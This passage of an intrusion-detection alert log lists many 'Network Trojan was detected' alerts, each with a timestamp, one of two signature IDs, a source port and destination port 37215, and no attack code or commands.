            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852743
            SID:2835222
            Source Port:46110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.737023
            SID:2829579
            Source Port:45338
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856307
            SID:2835222
            Source Port:50848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.648576
            SID:2835222
            Source Port:46268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.069711
            SID:2829579
            Source Port:51620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052595
            SID:2829579
            Source Port:38386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:03.805509
            SID:2835222
            Source Port:41920
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.760028
            SID:2835222
            Source Port:45224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.911903
            SID:2829579
            Source Port:34938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541838
            SID:2829579
            Source Port:55586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.687483
            SID:2829579
            Source Port:45332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.820760
            SID:2835222
            Source Port:55090
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525919
            SID:2835222
            Source Port:42146
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879829
            SID:2829579
            Source Port:33230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.585876
            SID:2835222
            Source Port:44552
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.697493
            SID:2829579
            Source Port:45454
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884502
            SID:2829579
            Source Port:37106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.298644
            SID:2829579
            Source Port:45386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912124
            SID:2829579
            Source Port:52806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290121
            SID:2829579
            Source Port:44362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.423397
            SID:2835222
            Source Port:38862
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.613409
            SID:2829579
            Source Port:48656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968192
            SID:2829579
            Source Port:60088
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.443278
            SID:2835222
            Source Port:50678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.979478
            SID:2829579
            Source Port:37984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.759289
            SID:2829579
            Source Port:42924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.557361
            SID:2835222
            Source Port:40742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450956
            SID:2835222
            Source Port:55878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936273
            SID:2835222
            Source Port:53820
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.295672
            SID:2829579
            Source Port:37610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065086
            SID:2835222
            Source Port:40664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263306
            SID:2829579
            Source Port:58280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.346401
            SID:2835222
            Source Port:37424
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.582594
            SID:2829579
            Source Port:57354
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.231071
            SID:2835222
            Source Port:44102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:01.777545
            SID:2829579
            Source Port:39126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.767304
            SID:2835222
            Source Port:52394
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:30.366953
            SID:2835222
            Source Port:57236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927743
            SID:2835222
            Source Port:51370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766467
            SID:2835222
            Source Port:59822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.387548
            SID:2835222
            Source Port:53390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582033
            SID:2829579
            Source Port:53412
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.864367
            SID:2835222
            Source Port:49518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786508
            SID:2835222
            Source Port:40102
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.814907
            SID:2829579
            Source Port:48992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.313217
            SID:2835222
            Source Port:55266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.774033
            SID:2835222
            Source Port:50108
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.872706
            SID:2835222
            Source Port:36582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061311
            SID:2835222
            Source Port:38950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342292
            SID:2829579
            Source Port:46608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899456
            SID:2835222
            Source Port:60542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811224
            SID:2835222
            Source Port:38854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.063921
            SID:2829579
            Source Port:36622
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.850679
            SID:2829579
            Source Port:47496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.998682
            SID:2835222
            Source Port:45796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870730
            SID:2829579
            Source Port:60034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.621548
            SID:2835222
            Source Port:40084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.117299
            SID:2829579
            Source Port:57476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852093
            SID:2829579
            Source Port:45926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995912
            SID:2829579
            Source Port:53620
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.552931
            SID:2835222
            Source Port:46726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.667719
            SID:2835222
            Source Port:47814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.071799
            SID:2829579
            Source Port:41242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927336
            SID:2829579
            Source Port:50096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.943340
            SID:2829579
            Source Port:52528
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.841087
            SID:2835222
            Source Port:56550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879876
            SID:2829579
            Source Port:43658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.473914
            SID:2835222
            Source Port:57918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.782042
            SID:2829579
            Source Port:33014
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.861149
            SID:2835222
            Source Port:54624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.681885
            SID:2835222
            Source Port:53630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.779497
            SID:2829579
            Source Port:49718
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.542548
            SID:2829579
            Source Port:56194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.073186
            SID:2829579
            Source Port:40882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.376921
            SID:2835222
            Source Port:53508
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767233
            SID:2829579
            Source Port:35192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344280
            SID:2835222
            Source Port:47546
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.871448
            SID:2835222
            Source Port:54392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.730209
            SID:2829579
            Source Port:35410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969586
            SID:2829579
            Source Port:38192
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026920
            SID:2835222
            Source Port:40656
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.612003
            SID:2835222
            Source Port:42972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058398
            SID:2835222
            Source Port:46702
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.830554
            SID:2829579
            Source Port:34640
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.999410
            SID:2829579
            Source Port:41238
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.327343
            SID:2829579
            Source Port:53776
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.068979
            SID:2829579
            Source Port:41136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.377123
            SID:2835222
            Source Port:57652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.746968
            SID:2829579
            Source Port:47604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:40.487751
            SID:2835222
            Source Port:37254
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.990169
            SID:2835222
            Source Port:59632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994798
            SID:2835222
            Source Port:46948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.956163
            SID:2835222
            Source Port:49964
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.159113
            SID:2835222
            Source Port:52492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.736350
            SID:2835222
            Source Port:33662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776211
            SID:2829579
            Source Port:50786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:24.107147
            SID:2829579
            Source Port:57608
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.773856
            SID:2829579
            Source Port:47002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912209
            SID:2829579
            Source Port:33550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:29.376763
            SID:2829579
            Source Port:46464
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.912172
            SID:2829579
            Source Port:59096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748719
            SID:2829579
            Source Port:39650
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.343615
            SID:2829579
            Source Port:44176
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.825661
            SID:2835222
            Source Port:57544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:53.676481
            SID:2835222
            Source Port:38930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064525
            SID:2835222
            Source Port:60778
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834107
            SID:2829579
            Source Port:55046
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.280410
            SID:2829579
            Source Port:34504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.574425
            SID:2835222
            Source Port:34874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:55.680037
            SID:2835222
            Source Port:60280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.471283
            SID:2829579
            Source Port:33410
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810752
            SID:2835222
            Source Port:57960
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.818706
            SID:2835222
            Source Port:42168
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961416
            SID:2835222
            Source Port:39286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.887732
            SID:2835222
            Source Port:51896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900433
            SID:2835222
            Source Port:58372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.064819
            SID:2835222
            Source Port:55950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.444886
            SID:2835222
            Source Port:54660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039293
            SID:2835222
            Source Port:55604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307599
            SID:2829579
            Source Port:56038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.021657
            SID:2829579
            Source Port:56456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.760427
            SID:2829579
            Source Port:48072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.811015
            SID:2835222
            Source Port:43714
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.290144
            SID:2829579
            Source Port:38280
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.153204
            SID:2835222
            Source Port:59564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870707
            SID:2829579
            Source Port:38078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.027034
            SID:2835222
            Source Port:42576
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.778603
            SID:2829579
            Source Port:52870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:34.426862
            SID:2835222
            Source Port:55808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.565587
            SID:2835222
            Source Port:44570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.313529
            SID:2835222
            Source Port:52734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.055079
            SID:2835222
            Source Port:39332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.575340
            SID:2829579
            Source Port:60852
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.968209
            SID:2835222
            Source Port:55302
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.695975
            SID:2835222
            Source Port:35138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778409
            SID:2835222
            Source Port:42292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.810723
            SID:2835222
            Source Port:37806
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.534821
            SID:2829579
            Source Port:34482
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.863733
            SID:2835222
            Source Port:41588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052196
            SID:2835222
            Source Port:38844
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.691636
            SID:2835222
            Source Port:44796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.719507
            SID:2835222
            Source Port:44900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.042632
            SID:2835222
            Source Port:43436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777688
            SID:2829579
            Source Port:38532
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.931641
            SID:2835222
            Source Port:52680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706735
            SID:2835222
            Source Port:38854
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.716614
            SID:2829579
            Source Port:39588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.046851
            SID:2829579
            Source Port:51802
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.946622
            SID:2835222
            Source Port:47138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.028244
            SID:2829579
            Source Port:59752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.899701
            SID:2835222
            Source Port:54422
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903338
            SID:2829579
            Source Port:60126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.977621
            SID:2835222
            Source Port:37686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518975
            SID:2835222
            Source Port:40874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.757496
            SID:2829579
            Source Port:47884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:22.067527
            SID:2829579
            Source Port:35870
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.999244
            SID:2829579
            Source Port:57564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.810387
            SID:2835222
            Source Port:36520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.435830
            SID:2835222
            Source Port:56096
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.748148
            SID:2835222
            Source Port:32798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:00.745193
            SID:2835222
            Source Port:50542
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809274
            SID:2835222
            Source Port:40988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.065250
            SID:2835222
            Source Port:57122
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.834311
            SID:2829579
            Source Port:42198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309078
            SID:2829579
            Source Port:42688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470750
            SID:2829579
            Source Port:57128
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.446450
            SID:2829579
            Source Port:58908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.738551
            SID:2829579
            Source Port:38138
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.821481
            SID:2835222
            Source Port:37972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870669
            SID:2829579
            Source Port:39034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.623407
            SID:2835222
            Source Port:56284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:01.873299
            SID:2829579
            Source Port:33186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.020176
            SID:2829579
            Source Port:49068
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436501
            SID:2829579
            Source Port:58704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994308
            SID:2829579
            Source Port:58442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963182
            SID:2835222
            Source Port:43564
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.990659
            SID:2835222
            Source Port:41152
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.852925
            SID:2829579
            Source Port:45002
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862766
            SID:2829579
            Source Port:46602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290680
            SID:2835222
            Source Port:44824
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.450744
            SID:2835222
            Source Port:53236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541612
            SID:2829579
            Source Port:45848
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808756
            SID:2835222
            Source Port:56042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969903
            SID:2835222
            Source Port:59586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.516557
            SID:2835222
            Source Port:33286
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.669953
            SID:2829579
            Source Port:46494
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.903510
            SID:2829579
            Source Port:57320
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.870473
            SID:2829579
            Source Port:56116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.525755
            SID:2835222
            Source Port:50252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.378894
            SID:2835222
            Source Port:55908
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.033147
            SID:2829579
            Source Port:51204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.714587
            SID:2835222
            Source Port:42292
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.999394
            SID:2829579
            Source Port:41592
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.070605
            SID:2835222
            Source Port:47924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862872
            SID:2829579
            Source Port:56414
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.474786
            SID:2835222
            Source Port:35438
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.066070
            SID:2829579
            Source Port:59890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
